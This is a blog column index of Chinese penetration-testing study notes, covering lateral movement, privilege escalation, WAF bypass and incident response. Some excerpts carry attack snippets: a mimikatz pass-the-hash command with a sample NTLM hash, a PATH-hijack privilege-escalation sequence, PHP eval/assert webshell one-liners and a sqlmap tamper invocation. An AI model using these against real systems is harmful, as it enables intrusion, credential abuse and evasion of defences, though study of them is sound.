渗透笔记2
文章平均质量分 62
笔记
深白色耳机
在学习的道路上勇往直前!
展开
-
xray和burp联动
xray下载安装先通过PowerShell打开xray所在的目录,运行,生成yaml文件genca在目录下生成证书生产证书后将证书导入浏览器导入后在本地安装一下。原创 2022-10-25 15:18:42 · 3416 阅读 · 0 评论 -
burp插件Authz与HaE
Authz可通过burp中BApp Store进行下载用来检测未授权漏洞,选择数据包将需要进行测试的数据发送到Authz模块中,在此处Cookie中随便输入,就会携带你输入的cookie去访问目标,点击run进行测试,如果返回的数字一样就存在未授权访问因为我们这里的url是随便找的,登录与不登录都能访问,所以这里返回的数字是一样的,此处是不存在未授权访问的。原创 2022-09-19 18:41:23 · 6897 阅读 · 1 评论 -
本地搭建vulfocus靶场&复现log4j2漏洞
环境用的是linux下的centos1.首先需要在centos中安装docker环境3.下载vulfocus镜像4.映射到centos中5.完成后访问centos的ip即可。原创 2022-09-10 10:43:17 · 1981 阅读 · 1 评论 -
MSF使用1
进入kali中文件,将原有的源注释掉,换上清华的源进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等):漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类:攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码:后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过原创 2022-06-12 21:17:32 · 3549 阅读 · 0 评论 -
Python 开发-多线程爆破
1.ftplib 模块使用2.遍历用户及密码字典3.尝试连接执行命令判断异或一句话免杀php原创 2022-06-05 22:21:33 · 701 阅读 · 0 评论 -
vulhub中漏洞复现1
CVE-2018-18778CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。影响版本:ACME mini_httpd before 1.30 分析当mini_httpd开启虚拟主机时,此原创 2022-05-23 10:14:43 · 1992 阅读 · 0 评论 -
第76天:Python开发-内外网收集Socket&子域名&DNS
Python开发-内外网收集Socket&子域名&DNS判断对方是否使用cdn通过python执行系统命令nslookup返回的结果来进行判断def cdn(url): #执行系统命令,将执行后返回的os对象进行read方法读取,将读取出来的结果存入变量 cdn_data=os.popen('nslookup'+' '+url).read() print(cdn_data) #print(cdn_data) #通过正则表达式进行筛选 n原创 2022-05-19 11:30:52 · 349 阅读 · 0 评论 -
应急响应-数据库&漏洞口令检索&应急取证箱
必须知识点:1.第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知或口令相关攻击也要进行筛选。2.排除三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本3.由于工具或脚本更新迭代快,分类复杂,打造自己的工具箱迫在眉睫案例 1-Win 日志自动神器 LogonTracer-外网内网如何安装使用:https://github.com/JPCERTCC/LogonTracer/wiki/linux 安装使用笔记:阿里云主机记得.原创 2022-03-27 21:44:59 · 5969 阅读 · 0 评论 -
应急响应-win&linux分析后门&勒索病毒&攻击
操作系统(windows,linux)应急响应:1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕虫,勒索等)。2.常见分析:计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题常见日志类别及存储:Windows,Linux补充资料:https://xz.aliyun.com/t/485https://www.secpulse.com/archives/114019.htmlhttps://docs.microsoft.原创 2022-03-26 18:37:04 · 4764 阅读 · 0 评论 -
应急响应-WEB分析php&javaweb&自动化工具
#应急响应:保护阶段,分析阶段,复现阶段,修复阶段,建议阶段目的:分析出攻击时间,攻击操作,攻击后果,安全修复等并给出合理解决方案。#必备知识点:1.熟悉常见的 WEB 安全攻击技术2.熟悉相关日志启用及存储查看等3.熟悉日志中记录数据分类及分析等#准备工作:1.收集目标服务器各类信息2.部署相关分析软件及平台等3.整理相关安全渗透工具指纹库4.针对异常表现第一时间触发思路从表现预估入侵面及权限面进行排查#有明确信息网站被入侵:基于时间 基于操作 基于指纹 基于其他#.原创 2022-03-25 16:57:34 · 1860 阅读 · 0 评论 -
内网安全-域横向CS&MSF联动及应急响应初识
案例1:MSF&CobaltStrike联动ShellCS->MSF创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器MSF->CSCS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线use exploit/windows/local/payload_inject首先准备一台外网的服务器,安装上cs和msf将cs会话反弹到msf上本地连接cs,目标cs上线后,创建监听msf处..原创 2022-03-25 09:02:01 · 4094 阅读 · 4 评论 -
内网安全-域横向网络&传输&应用层隧道技术
隧道技术:在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截解决的问题:CS、MSF 无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等常用的隧道技术有以下三种:网络层:IPv6 隧道## 标题、ICMP 隧道传输层:TCP 隧道、UDP 隧道、常规端口转发应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道案例 1-网络传输应用层检测连通性-检测先测试目标是否支持这些协议1. TCP 协议用“瑞士军刀”——netcat执行 nc 命令:nc <.原创 2022-03-22 21:10:30 · 5167 阅读 · 1 评论 -
内网安全-域横向内网漫游Socks代理隧道技术
因为是两个局域网当你用kali生成一个后门文件放到目标主机设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上设置为内网地址时,又找不到你原创 2022-03-20 19:56:30 · 2514 阅读 · 3 评论 -
内网安全-域横向CobaltStrike&SPN&RDP
案例1-域横向移动RDP传递-Mimikatz除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断当得到密码时,如果对方开启了3389端口,可以直接进行连接并登陆RDP明文密码链接1.windows: mstsc2.mstsc.exe /console /v:192.168.3.21 /admin3.linux: rdesktop 192.168.3...原创 2022-03-17 11:16:11 · 2794 阅读 · 0 评论 -
内网安全-域横向PTH&PTK&PTT哈希票据传递
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试案例 1-域横向移动 PTH 传递-mimikatzPTH ntlm 传递未打补丁下的工作组及域连接:sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20.原创 2022-03-14 15:01:12 · 1120 阅读 · 0 评论 -
内网安全-域横向smb&wmi明文或hash传递
知识点1:Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码针对以上情况,我们提供了4种方式解决此类问题1.利用哈希hash传递(path,ptk等)进行移动2.利用其他服务协议(SMB,WMI等)进行哈希移动3.利用注册表操作开启Wdigest Auth值进行获取4.利用工具或第三方平台(Hachcat)进行破解获取...原创 2022-03-11 11:16:50 · 3916 阅读 · 0 评论 -
内网安全-域横向批量at&schtasks&impacket
大致环境:2008 r2 webserver域内 web 服务器本地管理员账号密码 :.\administraotr:admin!@#45当前机器域用户密码 :god\webadmin:admin!@#45-------------------------------------2003 x86 fileserver域内文件服务器本地管理员账号密码 :administrator : admin当前机器域用户密码 :god\fileadmin : Admin12345-------原创 2022-03-09 12:09:51 · 2444 阅读 · 1 评论 -
内网安全-域环境&工作组&局域网探针方案
案例 1-基本信息收集操作演示当我们拿到web服务器的权限时,可通过下面命令进行信息收集了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做准备systeminfo 详细信息net start 启动服务tasklist 进程列表schtasks 计划任务案例 2-网络信息收集操作演示ipconfig /all 判断存在域-dnsnet view /domain 判断存在域net time /domain 判断主域netstat -ano 当前网络端口开放nslo...原创 2022-03-08 17:38:29 · 603 阅读 · 0 评论 -
权限提升-Linux定时任务&环境变量&数据库
一、Linux 提权本地环境变量安全-Aliyun(鸡肋)配合 SUID 进行环境变量提权-本地用户环境手写调用文件-编译-复制文件-增加环境变量-执行触发gcc demo.c -o shellcp /bin/sh /tmp/psexport PATH=/tmp:$PATH./shellid当执行shell命令的时候,默认去调用环境变量ps,而环境变量ps已经被我们覆盖了,就会去执行覆盖后的ps,从而执行shdemo.c内容...原创 2022-03-07 10:11:26 · 338 阅读 · 0 评论 -
权限提升-Linux脏牛内核漏洞&SUID&信息收集
一、Linux 提权自动化脚本利用-4 个脚本两个信息收集:LinEnum,linuxprivchecker两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2需要解释:信息收集有什么用哦?漏洞探针又有什么用哦LinEnum信息收集通过webshell把LinEnum可执行文件上传到对方服务器中的tmp目录因为tmp目录是linux服务器中的临时目录,重启后tmp目录会清空,所以这个目录一般都是可读取执行的通过webshell执行L.原创 2022-03-06 13:53:21 · 2557 阅读 · 0 评论 -
权限提升-烂土豆&dll劫持&引号路径&服务权限
必备知识点:令牌窃取配合烂土豆提权单纯令牌窃取:Web 权限或本地提权如配合烂土豆提权:Web 或数据库等权限不带引号服务路径安全问题服务路径提权:Web 权限或本地提权不安全的服务权限配置问服务权限配置:Web 权限或本地提权(Web 几率小)补充说明:dll 劫持提权及 AlwaysInstallElevated 等说明dll 劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋AlwaysInstallElevated 提权默认禁用配置,利用成功机会一、Win2.原创 2022-03-04 17:26:13 · 704 阅读 · 0 评论 -
权限提升-Redis&Postgre&令牌窃取&进程注入
一、Redis 数据库权限提升Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空;如果 Redis 以 root 身份运行,黑客可往服务器上写入 SSH 公钥文件,直接登录服务器。连接(未授权或有密码)-利用如下方法提权参考:https://blog.csdn.net/fly_hps/article/details/80937837(1).利用计划任务执行命令反弹 shell(2).写 ssh-keygen 公钥然后使用私钥登陆(3)...原创 2022-03-03 14:54:54 · 382 阅读 · 0 评论 -
权限提升-MY&MS&ORA等SQL数据库提权
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能数据库应用提权在权限提升中的意义WEB 或本地环境如何探针数据库应用数据库提权权限用户密码收集等方法目前数据库提权对应的技术及方法等流程:服务探针-信息收集-提权利用-获取权限一、UDF 提权知识点:(基于 MYSQL 调用命令执行函数)读取网站数据库配置文件(了解其命名规则及查找技巧).原创 2022-03-02 17:00:34 · 1146 阅读 · 0 评论 -
权限提升-Win溢出漏洞及AT&SC&PS提权
明确权限提升基础知识:权限划分明确权限提升环境问题:web及本地明确权限提升方法针对:针对方法适应问题明确权限提升针对版本:个人及服务器版本,针对方法知识点必备:用户及用户组权限划分;Windows 提权命令系统命令命令描述systeminfo打印系统信息whoami获得当前用户名whoami /priv当前账户权限ipconfig网络配置信息ipconfig /displaydns显示DNS缓存route print打印出路.原创 2022-02-28 21:39:36 · 498 阅读 · 0 评论 -
权限提升-网站权限后台漏洞第三方获取
当前知识点在渗透流程中的点前面-中期-后期对应知识关系当前知识点在权限提升的重点知识点顺序,理解思路,分类介绍等当前知识点权限提升权限介绍注重理解当前权限对应可操作的事情利用成功后的思想需要总结的思路...原创 2022-02-25 13:52:19 · 1221 阅读 · 3 评论 -
代码审计-PHP项目类RCE及文件包含下载删除
漏洞关键字:SQL 注入:select insert update mysql_query mysqli 等文件上传:$_FILES,type="file",上传,move_uploaded_file()等XSS 跨站:print print_r echo sprintf die var_dump var_export 等文件包含:include include_once require require_once 等代码执行:eval assert preg_replace c.原创 2022-02-24 19:45:57 · 897 阅读 · 0 评论 -
代码审计-PHP框架MVC类上传断点调试挖掘
知识点 1: 关键字搜索:(函数,键字,全局变量等)文件上传,$_FILES,move_uploaded_file 等 应用功能抓包:(任何可能存在上传的应用功能点)前台会员中心,后台新闻添加等可能存在上传的地方知识点 2:MVC 开发框架类:https://www.cnblogs.com/wsybky/p/8638876.html知识点 3:Thinkphp 框架:https://sites.thinkphp.cn/1556331...原创 2022-02-24 16:25:07 · 330 阅读 · 0 评论 -
代码审计-PHP无框架项目SQL注入挖掘技巧
代码审计教学计划:审计项目漏洞 Demo->审计思路->完整源码框架->验证并利用漏洞代码审计教学内容:PHP,JAVA 网站应用,引入框架类开发源码,相关审计工具及插件使用代码审计必备知识点:环境安装搭建使用,相关工具插件安装使用,掌握前期各种漏洞原理及利用代码审计开始前准备:审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等代码审计挖掘漏洞根本:可控变量及特定函数,不存在过滤或过滤不严谨存在绕过导致的安全漏洞...原创 2022-02-23 22:17:31 · 1188 阅读 · 0 评论 -
WAF绕过-漏洞利用之注入上传跨站等绕过
waf主要拦截的就是上图漏洞SQL 注入如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块安全狗:参考之前 payloadAliyun:基本修改指纹即可宝塔:匹配关键字外加/*等sqlmap --proxy="http://127.0.0.1:8080" --tamper="waf.py" --random-agent#文件上传1.php 截断 参考前面上传 waf 绕过 payload#XSS 跨站利用 XSStrike 绕过 加上--tim.原创 2022-02-22 14:55:20 · 1888 阅读 · 0 评论 -
WAF绕过-权限控制之代码混淆及行为造轮子
Safedog代码层手写及脚本绕过变量覆盖,加密混淆,异或生成BT Aliyun代码层手写及脚本绕过编码解码(变量覆盖,加密混淆,异或生产) 后门原理一、变量覆盖–后门绕过安全狗:例如php一句话木马:<?php @eval($_POST['shy']);?><?php assert($_POST['shy']);?>当对方有安全狗等waf时,此类简单的一句话木马上传后一定会被检测到并拦截。可以通过变量覆盖的方法,来拼接一句话木马<?php$a=$.原创 2022-02-20 20:37:43 · 932 阅读 · 1 评论 -
WAF绕过-漏洞发现之代理池指纹被动探针
漏洞防线触发WAF点-针对xray,awvs等1.工具速度-(代理池,延迟,白名单等)2.工具指纹-(特征修改,伪造模拟真实用户等)3.漏洞Payload-(数据变异,数据加密,白名单等)案例演示目录原创 2022-02-18 21:48:03 · 778 阅读 · 0 评论 -
WAF绕过-信息收集之反爬虫延时代理池技术
WAF拦截会出现在安全测试的各个层面,掌握各个层面的分析和绕过技术最为关键。演示案例1.Safedog-未开CC时CC就是DDOS攻击的一种,默认是不开启的。判断有没有WAF可以直接在路径上报错显示。可以用目录扫描工具扫此时发现扫描的目录结果都是误报通过本地的抓包工具抓取扫描器发送的数据包与通过网站访问的数据包进行对比将http请求方式修改为GET重新扫描2.当Safedog-开启CC时再次使用工具扫描,因为工具扫描对网站访问的频率太高,所以ip被安全狗拉入黑名单了可以通过这原创 2022-02-17 18:48:29 · 1200 阅读 · 0 评论 -
漏洞发现-API接口服务之漏洞探针类型利用修复
测试思路信息收集之信息利用第一步:首先识别网站是否有cdn,waf等产品,有则绕过。第二步:扫描收集到网站的端口信息,真实ip地址,ip绑定的其他域名。第三步:网站敏感路径扫描第四步:域名+端口敏感信息扫描第五步:ip+端口敏感目录扫描备注:字典不应该只是敏感路径,还应该有备份文件 zip rar tar tar.gz等格式文件端口服务类安全测试根据前期信息收集针对目标端口服务类探针后进行的安全测试,主要涉及攻击方法:口令安全,WEB类漏洞,版本漏洞等,其中产生的危害可大可小。属于.原创 2022-02-16 20:47:27 · 1302 阅读 · 0 评论 -
漏洞发现-APP应用之漏洞探针类型利用修复
思路说明:反编译提取 URL 或抓包获取 URL,进行 WEB 应用测试,如不存在或走其他协议的情况下,需采用网络接口抓包进行数据获取,转至其他协议安全测试!APP->WEB APP->其他 APP->逆向WEB 抓包,其他协议抓包演示及说明未逆向层面进行抓包区分各协议测试逆向层面进行提取 APK 代码层面数据https://www.cnblogs.com/L0ading/p/12388928.html案例演示:抓包工具 WEB 协议面使用说明抓包工具非 WEB .原创 2022-02-15 10:48:19 · 529 阅读 · 0 评论 -
漏洞发现-WEB应用之漏洞探针类型利用修复
站点判断已知 CMS如常见的 dedecms.discuz,wordpress 等源码结构,这种一般采用非框架类开发,但也有少部分采用的是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用白盒代码审计自行挖掘。开发框架如常见的 thinkphp,spring,flask 等开发的源码程序,这种源码程序正常的安全测试思路:先获取对应的开发框架信息(名字,版本),通过公开的框架类安全问题进行测试,如不存在可采用白盒代码审计自行挖掘。未知 CMS如常.原创 2022-02-13 14:15:35 · 797 阅读 · 0 评论 -
漏洞发现-操作系统之漏洞探针类型利用修复
探针原创 2022-02-12 13:33:15 · 754 阅读 · 0 评论 -
JAVA安全-目录遍历访问控制XSS等安全问题
听不懂,不记了,占个位置。学完java再补上原创 2022-02-08 23:05:35 · 1042 阅读 · 0 评论 -
JAVA安全-JWT安全及预编译CASE注入等
JAVA中防止sql注入//利用session防御,session内容正常情况下是用户无法修改的:select * from users where user = "'" + session.getAttribute("UserID") + "'";//参数绑定方式,利用了sql的预编译技术(PreparedStatement)预编译讲解:https://www.cnblogs.com/klyjb/p/11473857.html上面说的方式也不是能够绝对的进行SQL注入防御,只是减轻。比如.原创 2022-02-08 22:47:03 · 1959 阅读 · 0 评论 -
WEB漏洞-XXE&XML之利用检测绕过全解
xml基础概念XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。...原创 2022-02-07 21:15:21 · 1615 阅读 · 0 评论 -
WEB漏洞-反序列化之PHP&JAVA全解(下)
序列化和反序列化序列化(Serialization): 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。反序列化:从存储区中读取该数据,并将其还原为对象的过程,成为反序列化。小例子:使用writeObject()函数对person对象进行序列化,并把序列化后的字符串存入文件d:/person.txt中使用readObject()对文件d:/person.txt中序列化后的字符串进行反序列化操作并返回对象person注意:下..原创 2022-02-05 19:11:48 · 750 阅读 · 0 评论